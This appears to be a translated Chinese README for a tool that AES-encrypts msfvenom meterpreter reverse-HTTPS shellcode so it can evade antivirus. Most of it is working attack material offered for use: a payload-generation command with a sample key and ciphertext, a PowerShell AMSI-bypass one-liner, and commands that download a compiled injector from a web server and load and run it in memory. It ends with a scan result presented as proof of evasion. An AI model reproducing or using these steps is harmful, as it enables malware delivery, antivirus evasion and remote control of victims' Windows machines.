Shellcode-Encryptor

ShellcodeEncryptor

一个简单的外壳代码加密器/解密器/执行器来绕过防病毒。
注意:我已经完全重做了创建bypass的工作流程,我发现使用 PowerShell 将二进制文件注入内存是最有效的方法:
Shellcode-Encryptor:Shellcode加密解密执行工具 - 图1

目的

生成包含 base64 编码、AES 加密 shellcode 的 .Net 二进制文件,该 shellcode 将在 Windows 目标上执行,绕过防病毒。

指示

使用meterpreter_encryptor.py创建加密的 base64 shellcode:

  1. root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64
  2. [+] Generating MSFVENOM payload...
  3. [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  4. [-] No arch selected, selecting arch: x64 from the payload
  5. Found 1 compatible encoders
  6. Attempting to encode payload with 1 iterations of x64/xor_dynamic
  7. x64/xor_dynamic succeeded with size 667 (iteration=0)
  8. x64/xor_dynamic chosen with final size 667
  9. Payload size: 667 bytes
  10. Saved as: ./msf.bin
  11. [+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...
  12. [+] Base64 output:
  13. sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg

获取密钥和 shellcode 并将其插入ProcessInjector.cs

  1. //解密 base64 有效载荷
  2. string payload = "sZkMii [etc...]";
  3. string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

将 C# 代码编译成可执行文件(例如metInject.exe)并通过 Web 服务器提供服务。将可执行文件注入远程 PowerShell 进程:

  1. # AMSI 绕过
  2. $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
  4. $bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
  5. $assembly = [System.Reflection.Assembly]::Load($bytes);
  6. $entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
  7. $entryPointMethod.Invoke($null, (, [string[]] ('', '')));

帮助

  1. ./meterpreter_encryptor.py -h                                                                     
  2. usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
  4. optional arguments:
  5.   -h, --help            show this help message and exit
  6.   -l LPORT, --lport LPORT
  7.                         The local port that msfconsole is listening on.
  8.   -i LHOST, --lhost LHOST
  9.                         The local host that msfconsole is listening on.
  10.   -p PAYLOAD, --payload PAYLOAD
  11.                         The payload to generate in msfvenom.
  12.   -m METHOD, --method METHOD
  13.                         The method to use: thread/delegate.
  14.   -k KEY, --key KEY     The encryption key (32 chars).
  15.   -e ENCODER, --encoder ENCODER
  16.                         The meterpreter encoder.
  17.   -f FORMAT, --format FORMAT
  18.                         The format to output.
  1. ./meterpreter_encryptor.py -h
  2. 用法:meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
  4. 可选参数:
  5.    -h, --help 显示此帮助信息并退出
  6.    -l LPORT,--lport LPORT
  7.                          msfconsole 正在侦听的本地端口。
  8.    -i LHOST,--lhost LHOST
  9.                          msfconsole 正在侦听的本地主机。
  10.    -p 有效负载,--有效负载有效负载
  11.                           msfvenom 中生成的有效负载。
  12.    -m 方法,--method 方法
  13.                          使用方法:线程/委托。
  14.    -k KEY, --key KEY 加密密钥(32 个字符)。
  15.    -e 编码器,--encoder 编码器
  16.                          Meterpreter 编码器。
  17.    -f 格式,--格式格式
  18.                          要输出的格式。

AV 扫描结果

该二进制文件于 2021 年 3 月 10 日使用antiscan.me进行了扫描:
Shellcode-Encryptor:Shellcode加密解密执行工具 - 图2